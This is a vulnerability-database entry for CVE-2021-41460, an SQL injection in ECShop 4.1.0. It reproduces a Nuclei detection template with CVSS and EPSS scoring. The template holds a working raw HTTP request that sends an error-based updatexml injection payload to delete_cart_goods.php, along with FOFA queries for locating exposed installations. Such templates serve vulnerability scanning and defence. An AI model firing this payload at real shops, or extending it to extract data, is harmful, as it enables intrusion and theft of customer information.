Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-41460
HistoryAug 22, 2023 - 5:08 a.m.

ECShop 4.1.0 - SQL Injection

2023-08-2205:08:38
ProjectDiscovery
github.com
53
sql injection
sensitive information
patch
upgrade
cve-2021-41460
high severity
ecshop
shopex
cnvd
nvd

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.019

Percentile

88.9%

ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information.
id: CVE-2021-41460

info:
  name: ECShop 4.1.0 - SQL Injection
  author: SleepingBag945
  severity: high
  description: |
    ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: |
    Apply the latest patch or upgrade to a newer version of ECShop to mitigate the SQL Injection vulnerability (CVE-2021-41460).
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2020-58823
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41460
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-41460
    cwe-id: CWE-89
    epss-score: 0.00992
    epss-percentile: 0.83223
    cpe: cpe:2.3:a:shopex:ecshop:4.1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: shopex
    product: ecshop
    fofa-query:
      - product="ECShop"
      - product="ecshop"
  tags: cve2021,cve,cnvd,cnvd2020,ecshop,sqli,shopex
variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /delete_cart_goods.php  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        id=1||(updatexml(1,concat(0x7e,(select%20md5({{num}}))),1))

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'c8c605999f3d8352d7bb792cf3fdb25'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b397d96aeddbd254bb7ec713c50abafd8b5534e56bd672110d8f08b766957681022100c9f66e33f4fbe62da98961ede438d77ab8cd30c61f043f7a00b4fd31be2163f7:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.019

Percentile

88.9%

Related for NUCLEI:CVE-2021-41460